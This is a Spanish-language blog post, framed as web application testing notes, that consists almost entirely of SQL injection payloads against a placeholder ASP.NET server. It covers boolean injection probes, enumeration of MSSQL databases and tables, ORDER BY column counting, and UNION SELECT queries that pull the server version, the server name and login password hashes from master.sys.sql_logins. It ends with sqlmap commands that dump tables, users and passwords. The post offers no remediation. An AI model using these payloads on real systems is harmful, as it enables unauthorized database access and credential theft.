jueves, 9 de enero de 2014

Web Application Testing = Pruebas a Aplicaciones web.

=======================

Web Application Testing ( Pruebas a Aplicaciones WEB)

=======================

Comandos para la verificación de SQLi en servidores web

http://ip_del_servidor/

http://ip_del_servidor/abcd.aspx?id=2

http://ip_del_servidor/abcd.aspx?id=2'

http://ip_del_servidor/abcd.aspx?id='



http://ip_del_servidor/abcd.aspx?id=(2)      

http://ip_del_servidor/abcd.aspx?id=(4-2)  

http://ip_del_servidor/abcd.aspx?id=(4-1)

http://ip_del_servidor/abcd.aspx?id=2 or 1=1--

http://ip_del_servidor/abcd.aspx?id=2 or 1=2--

http://ip_del_servidor/abcd.aspx?id=1*1

http://ip_del_servidor/abcd.aspx?id=2 or 1 >-1#

http://ip_del_servidor/abcd.aspx?id=2 or 1<99#

http://ip_del_servidor/abcd.aspx?id=2 or 1<>1#

http://ip_del_servidor/abcd.aspx?id=2 or 2 != 3--

http://ip_del_servidor/abcd.aspx?id=2 &0#




Con el siguiente comando podemos sacar las bases de datos que tiene almacenas en el servidor
             

http://ip_del_servidor/abcd.aspx?id=2

http://ip_del_servidor/abcd.aspx?id=2 or 1 in (SELECT DB_NAME(1))--

http://ip_del_servidor/abcd.aspx?id=2 or 1 in (SELECT DB_NAME(2))--

http://ip_del_servidor/abcd.aspx?id=2 or 1 in (SELECT DB_NAME(3))--

http://ip_del_servidor/abcd.aspx?id=2 or 1 in (SELECT DB_NAME(4))--

http://ip_del_servidor/abcd.aspx?id=2 or 1 in (SELECT DB_NAME(N))--

http://ip_del_servidor/abcd.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--

http://ip_del_servidor/abcd.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--

http://ip_del_servidor/abcd.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--

Este comando verifica los espacios que tiene la pagina web los cuales son injectables o en los cuales se puede escribir información nada mas que se tiene que realizar una búsqueda de la cantidad de columnas que tiene, es por eso que se comienza por 100 y baja hasta 9, unan vez encontrado la cantidad de columnas en la pagina web, se le pude inyectar comandos para que arroje la versión del server, nombre del server etc.


http://ip_del_servidor/abcd.aspx?id=2 order by 100--

http://ip_del_servidor/abcd.aspx?id=2 order by 50--

http://ip_del_servidor/abcd.aspx?id=2 order by 25--

http://ip_del_servidor/abcd.aspx?id=2 order by 10--

http://ip_del_servidor/abcd.aspx?id=2 order by 5--

http://ip_del_servidor/bookdetail.aspx?id=2 order by 6--

http://ip_del_servidor/abcd.aspx?id=2 order by 7--

http://ip_del_servidor/abcd.aspx?id=2 order by 8--

http://ip_del_servidor/abcd.aspx?id=2 order by 9--

http://ip_del_servidor/abcd.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--

http://ip_del_servidor/abcd.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--

http://ip_del_servidor/abcd.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--

http://ip_del_servidor/abcd.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--

http://ip_del_servidor/abcd.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--

Este comando extrae el password y hash utilizando en el SQL server.

http://ip_del_servidor/abcd.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--


Con el siguiente comando se pueden obtener los nombres de las bases de datos, tablas y las columnas de las tablas las cuales algunas pueden contener usuarios y contraseñas.


python sqlmap.py  -u "http://ip_del_servidor/abcd.aspx?id=2" -b

python sqlmap.py  -u "http://ip_del_servidor/abcd.aspx?id=2" --current-user

python sqlmap.py  -u "http://ip_del_servidor/abcd.aspx?id=2" --current-db

python sqlmap.py  -u "http://ip_del_servidor/abcd.aspx?id=2" --dbs

python sqlmap.py  -u "http://ip_del_servidor/abcd.aspx?id=2" -D (base de datos) --tables

python sqlmap.py  -u "http://ip_del_servidor/abcd.aspx?id=2" -D (base de datos) -T (tabla1) --columns

python sqlmap.py  -u "http://ip_del_servidor/abcd.aspx?id=2" -D (base de datos) -T (tabla2) --columns

python sqlmap.py  -u "http://ip_del_servidor/abcd.aspx?id=2" -D (base de datos) -T (tabla3) --columns --dump

python sqlmap.py  -u "http://ip_del_servidor/abcd.aspx?id=2" -D (base de datos) -T (tabla4) --columns --dump

python sqlmap.py  -u "http://ip_del_servidor/abcd.aspx?id=2" --users --passwords

No hay comentarios:

Publicar un comentario